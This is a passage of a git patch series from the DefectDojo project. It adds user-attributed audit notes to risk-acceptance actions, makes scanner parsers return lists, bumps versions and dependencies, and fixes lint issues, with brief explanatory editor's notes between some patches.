@@ -1468,7 +1468,8 @@ class RiskAcceptanceSerializer(serializers.ModelSerializer):
 
     def create(self, validated_data):
         instance = super().create(validated_data)
-        add_findings_to_risk_acceptance(instance, instance.accepted_findings.all())
+        user = getattr(self.context.get("request", None), "user", None)
+        add_findings_to_risk_acceptance(user, instance, instance.accepted_findings.all())
         return instance
 
     def update(self, instance, validated_data):
@@ -1482,11 +1483,12 @@ def update(self, instance, validated_data):
         findings_to_remove = Finding.objects.filter(id__in=[x.id for x in findings_to_remove])
         # Make the update in the database
         instance = super().update(instance, validated_data)
+        user = getattr(self.context.get("request", None), "user", None)
         # Add the new findings
-        add_findings_to_risk_acceptance(instance, findings_to_add)
+        add_findings_to_risk_acceptance(user, instance, findings_to_add)
         # Remove the ones that were not present in the payload
         for finding in findings_to_remove:
-            remove_finding_from_risk_acceptance(instance, finding)
+            remove_finding_from_risk_acceptance(user, instance, finding)
         return instance
 
     @extend_schema_field(serializers.CharField())
diff --git a/dojo/api_v2/views.py b/dojo/api_v2/views.py
index b36924640b8..76521f5e009 100644
--- a/dojo/api_v2/views.py
+++ b/dojo/api_v2/views.py
@@ -654,7 +654,7 @@ def destroy(self, request, pk=None):
         instance = self.get_object()
         # Remove any findings on the risk acceptance
         for finding in instance.accepted_findings.all():
-            remove_finding_from_risk_acceptance(instance, finding)
+            remove_finding_from_risk_acceptance(request.user, instance, finding)
         # return the response of the object being deleted
         return super().destroy(request, pk=pk)
diff --git a/dojo/engagement/views.py b/dojo/engagement/views.py
index 777a5f7a118..ff86435d0cc 100644
--- a/dojo/engagement/views.py
+++ b/dojo/engagement/views.py
@@ -1250,7 +1250,7 @@ def add_risk_acceptance(request, eid, fid=None):
 
             findings = form.cleaned_data["accepted_findings"]
 
-            risk_acceptance = ra_helper.add_findings_to_risk_acceptance(risk_acceptance, findings)
+            risk_acceptance = ra_helper.add_findings_to_risk_acceptance(request.user, risk_acceptance, findings)
 
             messages.add_message(
                 request,
@@ -1360,7 +1360,7 @@ def view_edit_risk_acceptance(request, eid, raid, edit_mode=False):
             finding = get_object_or_404(
                 Finding, pk=request.POST["remove_finding_id"])
 
-            ra_helper.remove_finding_from_risk_acceptance(risk_acceptance, finding)
+            ra_helper.remove_finding_from_risk_acceptance(request.user, risk_acceptance, finding)
 
             messages.add_message(
                 request,
@@ -1391,7 +1391,7 @@ def view_edit_risk_acceptance(request, eid, raid, edit_mode=False):
             if not errors:
                 findings = add_findings_form.cleaned_data["accepted_findings"]
 
-                ra_helper.add_findings_to_risk_acceptance(risk_acceptance, findings)
+                ra_helper.add_findings_to_risk_acceptance(request.user, risk_acceptance, findings)
 
                 messages.add_message(
                     request,
diff --git a/dojo/finding/views.py b/dojo/finding/views.py
index 4b37ebc8a9a..c6ca73fcad4 100644
--- a/dojo/finding/views.py
+++ b/dojo/finding/views.py
@@ -991,10 +991,10 @@ def process_finding_form(self, request: HttpRequest, finding: Finding, context:
         # Handle risk exception related things
         if "risk_accepted" in context["form"].cleaned_data and context["form"]["risk_accepted"].value():
             if new_finding.test.engagement.product.enable_simple_risk_acceptance:
-                ra_helper.simple_risk_accept(new_finding, perform_save=False)
+                ra_helper.simple_risk_accept(request.user, new_finding, perform_save=False)
         else:
             if new_finding.risk_accepted:
-                ra_helper.risk_unaccept(new_finding, perform_save=False)
+                ra_helper.risk_unaccept(request.user, new_finding, perform_save=False)
         # Save and add new endpoints
         finding_helper.add_endpoints(new_finding, context["form"])
         # Remove unrelated endpoints
@@ -1270,7 +1270,7 @@ def close_finding(request, fid):
                 status.last_modified = timezone.now()
                 status.save()
             # Clear the risk acceptance, if present
-            ra_helper.risk_unaccept(finding)
+            ra_helper.risk_unaccept(request.user, finding)
 
             # Manage the jira status changes
             push_to_jira = False
@@ -1446,7 +1446,7 @@ def reopen_finding(request, fid):
                 status.last_modified = timezone.now()
                 status.save()
             # Clear the risk acceptance, if present
-            ra_helper.risk_unaccept(finding)
+            ra_helper.risk_unaccept(request.user, finding)
 
             # Manage the jira status changes
             push_to_jira = False
@@ -1626,7 +1626,7 @@ def simple_risk_accept(request, fid):
     if not finding.test.engagement.product.enable_simple_risk_acceptance:
         raise PermissionDenied
 
-    ra_helper.simple_risk_accept(finding)
+    ra_helper.simple_risk_accept(request.user, finding)
 
     messages.add_message(
         request, messages.WARNING, "Finding risk accepted.", extra_tags="alert-success",
@@ -1640,7 +1640,7 @@
 @user_is_authorized(Finding, Permissions.Risk_Acceptance, "fid")
 def risk_unaccept(request, fid):
     finding = get_object_or_404(Finding, id=fid)
-    ra_helper.risk_unaccept(finding)
+    ra_helper.risk_unaccept(request.user, finding)
 
     messages.add_message(
         request,
@@ -2851,9 +2851,9 @@ def finding_bulk_update_all(request, pid=None):
                     ):
                         skipped_risk_accept_count += 1
                     else:
-                        ra_helper.simple_risk_accept(finding)
+                        ra_helper.simple_risk_accept(request.user, finding)
                 elif form.cleaned_data["risk_unaccept"]:
-                    ra_helper.risk_unaccept(finding)
+                    ra_helper.risk_unaccept(request.user, finding)
 
         for prod in prods:
             calculate_grade(prod)
diff --git a/dojo/jira_link/helper.py b/dojo/jira_link/helper.py
index 3ccff3df814..d01f3bb3343 100644
--- a/dojo/jira_link/helper.py
+++ b/dojo/jira_link/helper.py
@@ -1623,7 +1623,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign
                     owner=finding.reporter,
                 )
                 finding.test.engagement.risk_acceptance.add(ra)
-                ra_helper.add_findings_to_risk_acceptance(ra, [finding])
+                ra_helper.add_findings_to_risk_acceptance(User.objects.get_or_create(username="JIRA")[0], ra, [finding])
                 status_changed = True
         elif jira_instance and resolution_name in jira_instance.false_positive_resolutions:
             if not finding.false_p:
@@ -1633,7 +1633,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign
                 finding.mitigated = None
                 finding.is_mitigated = False
                 finding.false_p = True
-                ra_helper.risk_unaccept(finding)
+                ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding)
                 status_changed = True
         else:
             # Mitigated by default as before
@@ -1645,7 +1645,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign
                 finding.mitigated_by, _created = User.objects.get_or_create(username="JIRA")
                 finding.endpoints.clear()
                 finding.false_p = False
-                ra_helper.risk_unaccept(finding)
+                ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding)
                 status_changed = True
     else:
        if not finding.active:
@@ -1655,7 +1655,7 @@ def process_resolution_from_jira(finding, resolution_id, resolution_name, assign
            finding.mitigated = None
            finding.is_mitigated = False
            finding.false_p = False
-           ra_helper.risk_unaccept(finding)
+           ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding)
            status_changed = True
 
     # for findings in a group, there is no jira_issue attached to the finding
diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py
index a1d628b33df..453fccb9f1d 100644
--- a/dojo/risk_acceptance/helper.py
+++ b/dojo/risk_acceptance/helper.py
@@ -1,4 +1,5 @@
 import logging
+from contextlib import suppress
 
 from dateutil.relativedelta import relativedelta
 from django.core.exceptions import PermissionDenied
@@ -8,7 +9,7 @@
 import dojo.jira_link.helper as jira_helper
 from dojo.celery import app
 from dojo.jira_link.helper import escape_for_jira
-from dojo.models import Finding, Risk_Acceptance, System_Settings
+from dojo.models import Dojo_User, Finding, Notes, Risk_Acceptance, System_Settings
 from dojo.notifications.helper import create_notification
 from dojo.utils import get_full_url, get_system_setting
 
@@ -102,7 +103,7 @@ def delete(eng, risk_acceptance):
     risk_acceptance.delete()
 
 
-def remove_finding_from_risk_acceptance(risk_acceptance, finding):
+def remove_finding_from_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Acceptance, finding: Finding) -> None:
     logger.debug("removing finding %i from risk acceptance %i", finding.id, risk_acceptance.id)
     risk_acceptance.accepted_findings.remove(finding)
     finding.active = True
@@ -112,9 +113,20 @@ def remove_finding_from_risk_acceptance(risk_acceptance, finding):
     finding.save(dedupe_option=False)
     # best effort jira integration, no status changes
     post_jira_comments(risk_acceptance, [finding], unaccepted_message_creator)
+    # Add a note to reflect that the finding was removed from the risk acceptance
+    if user is not None:
+        finding.notes.add(Notes.objects.create(
+            entry=(
+                f"{Dojo_User.generate_full_name(user)} ({user.id}) removed this finding from the risk acceptance: "
+                f'"{risk_acceptance.name}" ({get_view_risk_acceptance(risk_acceptance)})'
+            ),
+            author=user,
+        ))
+    return None
 
-def add_findings_to_risk_acceptance(risk_acceptance, findings):
+
+def add_findings_to_risk_acceptance(user: Dojo_User, risk_acceptance: Risk_Acceptance, findings: list[Finding]) -> None:
     for finding in findings:
         if not finding.duplicate or finding.risk_accepted:
             finding.active = False
@@ -123,11 +135,21 @@ def add_findings_to_risk_acceptance(risk_acceptance, findings):
             # Update any endpoint statuses on each of the findings
             update_endpoint_statuses(finding, accept_risk=True)
             risk_acceptance.accepted_findings.add(finding)
+            # Add a note to reflect that the finding was added to the risk acceptance
+            if user is not None:
+                finding.notes.add(Notes.objects.create(
+                    entry=(
+                        f"{Dojo_User.generate_full_name(user)} ({user.id}) added this finding to the risk acceptance: "
+                        f'"{risk_acceptance.name}" ({get_view_risk_acceptance(risk_acceptance)})'
+                    ),
+                    author=user,
+                ))
     risk_acceptance.save()
-
     # best effort jira integration, no status changes
     post_jira_comments(risk_acceptance, findings, accepted_message_creator)
 
+    return None
+
 
 @app.task
 def expiration_handler(*args, **kwargs):
@@ -174,6 +196,16 @@ def expiration_handler(*args, **kwargs):
             risk_acceptance.save()
 
 
+def get_view_risk_acceptance(risk_acceptance: Risk_Acceptance) -> str:
+    """Return the fully qualified URL of the view risk acceptance page."""
+    # Suppress the AttributeError raised in the rare case that a risk acceptance has no engagement
+    with suppress(AttributeError):
+        return get_full_url(
+            reverse("view_risk_acceptance", args=(risk_acceptance.engagement.id, risk_acceptance.id)),
+        )
+    return ""
+
+
 def expiration_message_creator(risk_acceptance, heads_up_days=0):
     return "Risk acceptance [({})|{}] with {} findings has expired".format(
         escape_for_jira(risk_acceptance.name),
@@ -267,7 +299,7 @@ def prefetch_for_expiration(risk_acceptances):
     )
 
 
-def simple_risk_accept(finding, perform_save=True):
+def simple_risk_accept(user: Dojo_User, finding: Finding, perform_save=True) -> None:
     if not finding.test.engagement.product.enable_simple_risk_acceptance:
         raise PermissionDenied
 
@@ -282,9 +314,15 @@ def simple_risk_accept(finding, perform_save=True):
     # post_jira_comment might reload from database so see unaccepted finding. but the comment
     # only contains some text so that's ok
     post_jira_comment(finding, accepted_message_creator)
+    # Add a note to reflect that the finding was risk accepted
+    if user is not None:
+        finding.notes.add(Notes.objects.create(
+            entry=(f"{Dojo_User.generate_full_name(user)} ({user.id}) has risk accepted this finding"),
+            author=user,
+        ))
 
 
-def risk_unaccept(finding, perform_save=True):
+def risk_unaccept(user: Dojo_User, finding: Finding, perform_save=True) -> None:
    logger.debug("unaccepting finding %i:%s if it is currently risk accepted", finding.id, finding)
    if finding.risk_accepted:
        logger.debug("unaccepting finding %i:%s", finding.id, finding)
@@ -302,6 +340,12 @@ def risk_unaccept(finding, perform_save=True):
        # post_jira_comment might reload from database so see unaccepted finding. but the comment
        # only contains some text so that's ok
        post_jira_comment(finding, unaccepted_message_creator)
+       # Add a note to reflect that the risk exception was removed from the finding
+       if user is not None:
+           finding.notes.add(Notes.objects.create(
+               entry=(f"{Dojo_User.generate_full_name(user)} ({user.id}) removed a risk exception from this finding"),
+               author=user,
+           ))
 
 
 def remove_from_any_risk_acceptance(finding):
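Editor's note: after this commit, every risk-acceptance helper takes the acting user as its first argument so the new audit note can record who acted. A condensed sketch of the two calling conventions seen in the diffs above:

    import dojo.risk_acceptance.helper as ra_helper

    # Views and serializers pass the authenticated user...
    ra_helper.add_findings_to_risk_acceptance(request.user, risk_acceptance, findings)
    ra_helper.remove_finding_from_risk_acceptance(request.user, risk_acceptance, finding)
    # ...while the JIRA resolution path attributes the change to a synthetic "JIRA" user.
    ra_helper.risk_unaccept(User.objects.get_or_create(username="JIRA")[0], finding)

Passing None is also tolerated: each helper skips the note when user is None, which the serializer's getattr(..., "user", None) fallback relies on.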
From 3218c641879265634f1614cfbd27b648a2358ea7 Mon Sep 17 00:00:00 2001
From: Cody Maffucci <46459665+Maffooch@users.noreply.github.com>
Date: Mon, 23 Sep 2024 11:39:37 -0500
Subject: [PATCH 53/62] Parsers: Specify lists rather than `dict.values()` (#10945)

---
 dojo/tools/blackduck/parser.py                 | 2 +-
 dojo/tools/blackduck_binary_analysis/parser.py | 2 +-
 dojo/tools/h1/parser.py                        | 2 +-
 dojo/tools/intsights/parser.py                 | 2 +-
 dojo/tools/mend/parser.py                      | 2 +-
 dojo/tools/qualys_webapp/parser.py             | 2 +-
 dojo/tools/sslscan/parser.py                   | 2 +-
 dojo/tools/sslyze/parser_xml.py                | 2 +-
 dojo/tools/whitehat_sentinel/parser.py         | 2 +-
 9 files changed, 9 insertions(+), 9 deletions(-)

diff --git a/dojo/tools/blackduck/parser.py b/dojo/tools/blackduck/parser.py
index a79e9db9677..12f01a07d0c 100644
--- a/dojo/tools/blackduck/parser.py
+++ b/dojo/tools/blackduck/parser.py
@@ -78,7 +78,7 @@ def ingest_findings(self, normalized_findings, test):
 
             dupes[dupe_key] = finding
 
-        return dupes.values()
+        return list(dupes.values())
 
     def format_title(self, i):
         if i.channel_version_origin_id is not None:
diff --git a/dojo/tools/blackduck_binary_analysis/parser.py b/dojo/tools/blackduck_binary_analysis/parser.py
index 7e545e67517..0f38773dd95 100644
--- a/dojo/tools/blackduck_binary_analysis/parser.py
+++ b/dojo/tools/blackduck_binary_analysis/parser.py
@@ -104,7 +104,7 @@ def ingest_findings(self, sorted_findings, test):
 
             findings[unique_finding_key] = finding
 
-        return findings.values()
+        return list(findings.values())
 
     def format_title(self, i):
         title = f"{i.object_name}: {i.component} {i.version} Vulnerable"
diff --git a/dojo/tools/h1/parser.py b/dojo/tools/h1/parser.py
index e182af6b762..c386dec04d3 100644
--- a/dojo/tools/h1/parser.py
+++ b/dojo/tools/h1/parser.py
@@ -100,7 +100,7 @@ def get_vulnerability_disclosure_json_findings(self, tree, test):
             )
             finding.unsaved_endpoints = []
             dupes[dupe_key] = finding
-        return dupes.values()
+        return list(dupes.values())
 
     def build_description(self, content):
         date = content["attributes"]["created_at"]
diff --git a/dojo/tools/intsights/parser.py b/dojo/tools/intsights/parser.py
index e49c61b852f..abd05ee6ef6 100644
--- a/dojo/tools/intsights/parser.py
+++ b/dojo/tools/intsights/parser.py
@@ -71,4 +71,4 @@ def get_findings(self, file, test):
                 duplicates[dupe_key] = alert
             if dupe_key not in duplicates:
                 duplicates[dupe_key] = True
-        return duplicates.values()
+        return list(duplicates.values())
diff --git a/dojo/tools/mend/parser.py b/dojo/tools/mend/parser.py
index 60ad8931098..dee917ce2a1 100644
--- a/dojo/tools/mend/parser.py
+++ b/dojo/tools/mend/parser.py
@@ -161,4 +161,4 @@ def create_finding_key(f: Finding) -> str:
         if dupe_key not in dupes:
             dupes[dupe_key] = finding
 
-    return dupes.values()
+    return list(dupes.values())
diff --git a/dojo/tools/qualys_webapp/parser.py b/dojo/tools/qualys_webapp/parser.py
index 59c0d2b855c..840c9bc8709 100644
--- a/dojo/tools/qualys_webapp/parser.py
+++ b/dojo/tools/qualys_webapp/parser.py
@@ -462,7 +462,7 @@ def qualys_webapp_parser(qualys_xml_file, test, unique, enable_weakness=False):
         ).values(),
     )
 
-    return items
+    return list(items)
 
 
 class QualysWebAppParser:
diff --git a/dojo/tools/sslscan/parser.py b/dojo/tools/sslscan/parser.py
index 621ded3daf1..9ac284c1267 100644
--- a/dojo/tools/sslscan/parser.py
+++ b/dojo/tools/sslscan/parser.py
@@ -93,4 +93,4 @@ def get_findings(self, file, test):
                 else:
                     endpoint = Endpoint(host=host, port=port)
                 finding.unsaved_endpoints.append(endpoint)
-        return dupes.values()
+        return list(dupes.values())
diff --git a/dojo/tools/sslyze/parser_xml.py b/dojo/tools/sslyze/parser_xml.py
index 710b0c73b26..24fe3c9b3cf 100644
--- a/dojo/tools/sslyze/parser_xml.py
+++ b/dojo/tools/sslyze/parser_xml.py
@@ -161,4 +161,4 @@ def get_findings(self, file, test):
                         host=host, port=port, protocol=protocol,
                     ),
                 )
-        return dupes.values()
+        return list(dupes.values())
diff --git a/dojo/tools/whitehat_sentinel/parser.py b/dojo/tools/whitehat_sentinel/parser.py
index eeb97ee8f5e..fe336bf27df 100644
--- a/dojo/tools/whitehat_sentinel/parser.py
+++ b/dojo/tools/whitehat_sentinel/parser.py
@@ -268,4 +268,4 @@ def _convert_whitehat_sentinel_vulns_to_dojo_finding(
         finding.unsaved_endpoints = endpoints
         dupes[dupe_key] = finding
 
-    return dupes.values()
+    return list(dupes.values())
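Editor's note: the motivation for this sweep is that dict.values() returns a view object, not a list; it cannot be indexed or sliced, and it does not serialize the way downstream consumers of get_findings() may expect. A plain-Python illustration:

    dupes = {"a": 1, "b": 2}
    view = dupes.values()         # dict_values([1, 2]), a live view
    # view[0]                     # TypeError: 'dict_values' object is not subscriptable
    items = list(dupes.values())  # a real list: items[0] == 1

Wrapping in list() also snapshots the values, so later mutation of the dict no longer changes what was returned.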
From 57b228e9608c456bce7060ab6022010a397335cf Mon Sep 17 00:00:00 2001
From: DefectDojo release bot
Date: Mon, 23 Sep 2024 17:02:51 +0000
Subject: [PATCH 54/62] Update versions in application files

---
 components/package.json    | 2 +-
 dojo/__init__.py           | 2 +-
 helm/defectdojo/Chart.yaml | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/components/package.json b/components/package.json
index 49f5862eecd..3299d3eb89c 100644
--- a/components/package.json
+++ b/components/package.json
@@ -1,6 +1,6 @@
 {
   "name": "defectdojo",
-  "version": "2.39.0-dev",
+  "version": "2.38.3",
   "license" : "BSD-3-Clause",
   "private": true,
   "dependencies": {
diff --git a/dojo/__init__.py b/dojo/__init__.py
index bac40506f9a..996b03df38c 100644
--- a/dojo/__init__.py
+++ b/dojo/__init__.py
@@ -4,6 +4,6 @@
 # Django starts so that shared_task will use this app.
 from .celery import app as celery_app  # noqa: F401
 
-__version__ = "2.38.2"
+__version__ = "2.38.3"
 __url__ = "https://github.com/DefectDojo/django-DefectDojo"
 __docs__ = "https://documentation.defectdojo.com"
diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml
index 9bd09f45faf..1e34a710be9 100644
--- a/helm/defectdojo/Chart.yaml
+++ b/helm/defectdojo/Chart.yaml
@@ -1,8 +1,8 @@
 apiVersion: v2
-appVersion: "2.39.0-dev"
+appVersion: "2.38.3"
 description: A Helm chart for Kubernetes to install DefectDojo
 name: defectdojo
-version: 1.6.151-dev
+version: 1.6.151
 icon: https://www.defectdojo.org/img/favicon.ico
 maintainers:
 - name: madchap

From eb5903825a004de040c9e66b686e583bb05b2027 Mon Sep 17 00:00:00 2001
From: DefectDojo release bot
Date: Mon, 23 Sep 2024 17:26:29 +0000
Subject: [PATCH 55/62] Update versions in application files

---
 components/package.json    | 2 +-
 dojo/__init__.py           | 2 +-
 helm/defectdojo/Chart.yaml | 4 ++--
 3 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/components/package.json b/components/package.json
index 3299d3eb89c..49f5862eecd 100644
--- a/components/package.json
+++ b/components/package.json
@@ -1,6 +1,6 @@
 {
   "name": "defectdojo",
-  "version": "2.38.3",
+  "version": "2.39.0-dev",
   "license" : "BSD-3-Clause",
   "private": true,
   "dependencies": {
diff --git a/dojo/__init__.py b/dojo/__init__.py
index 996b03df38c..82fc1241506 100644
--- a/dojo/__init__.py
+++ b/dojo/__init__.py
@@ -4,6 +4,6 @@
 # Django starts so that shared_task will use this app.
 from .celery import app as celery_app  # noqa: F401
 
-__version__ = "2.38.3"
+__version__ = "2.39.0-dev"
 __url__ = "https://github.com/DefectDojo/django-DefectDojo"
 __docs__ = "https://documentation.defectdojo.com"
diff --git a/helm/defectdojo/Chart.yaml b/helm/defectdojo/Chart.yaml
index 1e34a710be9..1052b312093 100644
--- a/helm/defectdojo/Chart.yaml
+++ b/helm/defectdojo/Chart.yaml
@@ -1,8 +1,8 @@
 apiVersion: v2
-appVersion: "2.38.3"
+appVersion: "2.39.0-dev"
 description: A Helm chart for Kubernetes to install DefectDojo
 name: defectdojo
-version: 1.6.151
+version: 1.6.152-dev
 icon: https://www.defectdojo.org/img/favicon.ico
 maintainers:
 - name: madchap

From 2c591f2e9feccbc36abcd9c48e74efafbff4965f Mon Sep 17 00:00:00 2001
From: Ross Esposito
Date: Mon, 23 Sep 2024 12:54:07 -0500
Subject: [PATCH 56/62] Fixing merge conflict

---
 dojo/tools/semgrep/parser.py | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/dojo/tools/semgrep/parser.py b/dojo/tools/semgrep/parser.py
index cd32872f379..b7472005daa 100644
--- a/dojo/tools/semgrep/parser.py
+++ b/dojo/tools/semgrep/parser.py
@@ -140,12 +140,12 @@ def convert_severity(self, val):
         elif upper_value == "LOW":
             return "Low"
         elif upper_value == "INFO":
-                if "WARNING" == val.upper():
-                    return "Medium"
-                if "ERROR" == val.upper() or "HIGH" == val.upper():
-                    return "High"
-                if "INFO" == val.upper():
-                    return "Info"
+            if "WARNING" == val.upper():
+                return "Medium"
+            if "ERROR" == val.upper() or "HIGH" == val.upper():
+                return "High"
+            if "INFO" == val.upper():
+                return "Info"
         msg = f"Unknown value for severity: {val}"
         raise ValueError(msg)
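Editor's note: convert_severity() is touched again in PATCH 61 and PATCH 62 below, which suggests the branching is fragile. A table-driven alternative, offered only as a sketch and not as the shipped parser code:

    SEVERITY_MAP = {
        "CRITICAL": "Critical",
        "ERROR": "High",
        "HIGH": "High",
        "WARNING": "Medium",
        "MEDIUM": "Medium",
        "LOW": "Low",
        "INFO": "Info",
    }

    def convert_severity(val: str) -> str:
        try:
            return SEVERITY_MAP[val.upper()]
        except KeyError:
            msg = f"Unknown value for severity: {val}"
            raise ValueError(msg)

This preserves the behavior of the if/elif ladder for every value it handles while removing the unreachable nested branches under "INFO".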
From 3c54a45e017bf8ff3832edb964401f3ece974f6e Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 23 Sep 2024 13:27:26 -0500
Subject: [PATCH 57/62] Bump boto3 from 1.35.23 to 1.35.24 (#10946)

Bumps [boto3](https://github.com/boto/boto3) from 1.35.23 to 1.35.24.
- [Release notes](https://github.com/boto/boto3/releases)
- [Commits](https://github.com/boto/boto3/compare/1.35.23...1.35.24)

---
updated-dependencies:
- dependency-name: boto3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements.txt b/requirements.txt
index 322272f10aa..b0c8e28b62b 100644
--- a/requirements.txt
+++ b/requirements.txt
@@ -69,7 +69,7 @@ django-ratelimit==4.1.0
 argon2-cffi==23.1.0
 blackduck==1.1.3
 pycurl==7.45.3  # Required for Celery Broker AWS (SQS) support
-boto3==1.35.23  # Required for Celery Broker AWS (SQS) support
+boto3==1.35.24  # Required for Celery Broker AWS (SQS) support
 netaddr==1.3.0
 vulners==2.2.1
 fontawesomefree==6.6.0

From 3623253b2cc2368244aabd415bd37da729742905 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 23 Sep 2024 13:28:20 -0500
Subject: [PATCH 58/62] Bump ruff from 0.6.6 to 0.6.7 (#10947)

Bumps [ruff](https://github.com/astral-sh/ruff) from 0.6.6 to 0.6.7.
- [Release notes](https://github.com/astral-sh/ruff/releases)
- [Changelog](https://github.com/astral-sh/ruff/blob/main/CHANGELOG.md)
- [Commits](https://github.com/astral-sh/ruff/compare/0.6.6...0.6.7)

---
updated-dependencies:
- dependency-name: ruff
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements-lint.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements-lint.txt b/requirements-lint.txt
index 8a66517d3b6..7dbbaa1c419 100644
--- a/requirements-lint.txt
+++ b/requirements-lint.txt
@@ -1 +1 @@
-ruff==0.6.6
\ No newline at end of file
+ruff==0.6.7
\ No newline at end of file

From 86b9ed01adc8b52d2cdfa786b31b2002bee2edcf Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Mon, 23 Sep 2024 13:29:44 -0500
Subject: [PATCH 59/62] Bump pdfmake from 0.2.12 to 0.2.13 in /components (#10950)

Bumps [pdfmake](https://github.com/bpampuch/pdfmake) from 0.2.12 to 0.2.13.
- [Release notes](https://github.com/bpampuch/pdfmake/releases)
- [Changelog](https://github.com/bpampuch/pdfmake/blob/0.2.13/CHANGELOG.md)
- [Commits](https://github.com/bpampuch/pdfmake/compare/0.2.12...0.2.13)

---
updated-dependencies:
- dependency-name: pdfmake
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 components/package.json | 2 +-
 components/yarn.lock    | 8 ++++----
 2 files changed, 5 insertions(+), 5 deletions(-)

diff --git a/components/package.json b/components/package.json
index b1a047f22bc..e5df589df37 100644
--- a/components/package.json
+++ b/components/package.json
@@ -35,7 +35,7 @@
     "metismenu": "~3.0.7",
     "moment": "^2.30.1",
     "morris.js": "morrisjs/morris.js",
-    "pdfmake": "^0.2.12",
+    "pdfmake": "^0.2.13",
     "startbootstrap-sb-admin-2": "1.0.7"
   },
   "engines": {
diff --git a/components/yarn.lock b/components/yarn.lock
index 8bd8311e89b..7bb19365790 100644
--- a/components/yarn.lock
+++ b/components/yarn.lock
@@ -824,10 +824,10 @@ path-parse@^1.0.7:
   resolved "https://registry.yarnpkg.com/path-parse/-/path-parse-1.0.7.tgz#fbc114b60ca42b30d9daf5858e4bd68bbedb6735"
   integrity sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==
 
-pdfmake@^0.2.12:
-  version "0.2.12"
-  resolved "https://registry.yarnpkg.com/pdfmake/-/pdfmake-0.2.12.tgz#5156f91ff73797947942aa342423bedaa0c0bc93"
-  integrity sha512-TFsqaG6KVtk+TWermmJNNwom3wmB/xiz07prM74KBhdM+7pz3Uwq2b0uoqhhQRn6cYUTpL8lXZY6xF011o1YcQ==
+pdfmake@^0.2.13:
+  version "0.2.13"
+  resolved "https://registry.yarnpkg.com/pdfmake/-/pdfmake-0.2.13.tgz#ea43fe9f0c8de1e5ec7b08486d6f4f8bbb8619e4"
+  integrity sha512-qeVE9Bzjm0oPCitH4/HYM/XCGTwoeOAOVAXPnV3s0kpPvTLkTF/bAF4jzorjkaIhXGQhzYk6Xclt0hMDYLY93w==
   dependencies:
     "@foliojs-fork/linebreak" "^1.1.1"
     "@foliojs-fork/pdfkit" "^0.14.0"

From b0f0c3aebb67f52ab2afc2c8a900de6a1f037969 Mon Sep 17 00:00:00 2001
From: Ross Esposito
Date: Mon, 23 Sep 2024 13:34:01 -0500
Subject: [PATCH 60/62] Fixing sha settings value

---
 dojo/settings/.settings.dist.py.sha256sum | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/dojo/settings/.settings.dist.py.sha256sum b/dojo/settings/.settings.dist.py.sha256sum
index f8adf9d7d4e..8a22d6140cf 100644
--- a/dojo/settings/.settings.dist.py.sha256sum
+++ b/dojo/settings/.settings.dist.py.sha256sum
@@ -1 +1 @@
-f7e63afa0003d1992f8247f9a7a830847bd7498fa1e2d46d6ea04e3006bb9ee2
+bf2078296b31ba8c8376fdd88bbf1d552d0fba8b6e465a8552ac2fa901aa7e60
From 38ed4c19d344f69b796c9fc8803264b67b1b8296 Mon Sep 17 00:00:00 2001
From: Ross Esposito
Date: Mon, 23 Sep 2024 14:08:47 -0500
Subject: [PATCH 61/62] Fixing more lint errors

---
 dojo/api_v2/serializers.py     |  4 ++--
 dojo/metrics/utils.py          |  3 +--
 dojo/product_type/queries.py   |  1 +
 dojo/risk_acceptance/helper.py |  4 ++--
 dojo/tools/h1/parser.py        | 20 ++++++++++----------
 dojo/tools/semgrep/parser.py   |  6 +++---
 6 files changed, 19 insertions(+), 19 deletions(-)

diff --git a/dojo/api_v2/serializers.py b/dojo/api_v2/serializers.py
index 658f45df6a5..371f9f4266f 100644
--- a/dojo/api_v2/serializers.py
+++ b/dojo/api_v2/serializers.py
@@ -555,8 +555,8 @@ def validate(self, data):
         if self.context["request"].method == "POST" and "password" not in data:
             msg = "Passwords must be supplied for new users"
             raise ValidationError(msg)
-        else:
-            return super().validate(data)
+
+        return super().validate(data)
 
 
 class UserContactInfoSerializer(serializers.ModelSerializer):
diff --git a/dojo/metrics/utils.py b/dojo/metrics/utils.py
index b68829da1b3..d22b13beb4d 100644
--- a/dojo/metrics/utils.py
+++ b/dojo/metrics/utils.py
@@ -37,8 +37,7 @@
 def get_metrics_finding_filter_class() -> Type[Union[MetricsFindingFilter, MetricsFindingFilterWithoutObjectLookups]]:
     if get_system_setting("filter_string_matching", False):
         return MetricsFindingFilterWithoutObjectLookups
-    else:
-        return MetricsFindingFilter
+    return MetricsFindingFilter
 
 
 def finding_queries(
